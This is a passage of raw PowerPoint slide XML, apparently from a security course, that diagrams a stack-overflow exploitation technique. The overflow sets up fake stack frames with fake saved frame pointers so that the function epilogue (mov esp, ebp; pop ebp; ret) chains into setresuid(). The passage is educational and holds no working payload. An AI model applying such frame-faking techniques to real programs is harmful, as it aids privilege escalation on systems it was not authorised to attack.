            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The initial overflow sets up a number of fake function frames that contain fake saved frame pointers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34522336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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3600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9349" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048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9350" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3886200"/>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9352" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="304800" y="21717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3" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2209800" y="21717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4" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="22098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5" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3048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62" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="22098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63" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3048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83" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12128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384" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="3600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pointer to fake1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209385" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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386" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="3886200"/>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buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209389" name="Line 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="43434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0" name="Line 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="24384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1" name="Line 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="43434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2" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="24384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3" name="Rectangle 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="33464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394" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="3028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fake1 (ptr to fake2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209395" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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setresuid()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209396" name="Rectangle 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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397" name="Rectangle 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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398" name="Rectangle 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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399" name="Rectangle 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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01" name="Rectangle 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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02" name="Rectangle 58"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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03" name="Rectangle 59"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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07" name="Rectangle 63"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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08" name="Line 64"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="24384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09" name="Line 65"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="43434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1" name="Rectangle 67"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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13" name="Line 69"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6477000" y="3600450"/>
            <a:ext cx="0" cy="6858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4" name="Line 70"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4572000" y="3600450"/>
            <a:ext cx="0" cy="6858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5" name="Line 71"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="64770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6" name="Line 72"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="45720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7" name="Rectangle 73"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="54800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418" name="Rectangle 74"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="3028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fake1 (ptr to fake2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209419" name="Rectangle 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209420" name="Rectangle 76"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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21" name="Rectangle 77"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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422" name="Rectangle 78"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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423" name="Rectangle 79"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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24" name="Rectangle 80"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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25" name="Rectangle 81"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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26" name="Rectangle 82"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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27" name="Rectangle 83"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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28" name="Line 84"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="45720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29" name="Line 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="64770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1" name="Line 87"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8610600" y="302895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2" name="Line 88"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6705600" y="302895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3" name="Line 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="86106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4" name="Line 90"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="67056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5" name="Rectangle 91"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76136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438" name="Rectangle 94"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67056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39" name="Rectangle 95"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67056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440" name="Rectangle 96"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67056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441" name="Rectangle 97"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67056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42" name="Rectangle 98"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67056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43" name="Rectangle 99"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67056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44" name="Rectangle 100"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67056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45" name="Rectangle 101"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67056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46" name="Line 102"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="67056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47" name="Line 103"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="86106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48" name="Rectangle 104"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67056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err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209449" name="Text Box 105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3200401"/>
            <a:ext cx="1518364" cy="830997"/>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when entering into</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>() from the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ret in the epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text Box 105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2498726" y="4343400"/>
            <a:ext cx="1494971" cy="461665"/>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after the overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text Box 105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4675194" y="3613547"/>
            <a:ext cx="1632478" cy="1015663"/>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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>after the original </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>function returned and</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>before the execution </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>of the epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-36503" y="4288684"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Right Arrow 1"/>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2"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3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-40190" y="3607518"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Right Arrow 72"/>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4"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77" name="Group 76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2108210" y="4290020"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Right Arrow 7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80" name="Group 79"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2104523" y="3614807"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Right Arrow 80"/>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2"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3" name="Group 82"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4241034" y="3607518"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84" name="Right Arrow 83"/>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5"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86" name="Group 85"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4236484" y="3028950"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87" name="Right Arrow 86"/>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8"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9" name="Group 88"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6363163" y="1314450"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Right Arrow 89"/>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1"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97" name="Group 96"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6363163" y="2743200"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="Right Arrow 9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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326580191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5" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4448255"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6" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2543255"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7" name="Line 5"/>
          <p:cNvSpPr>
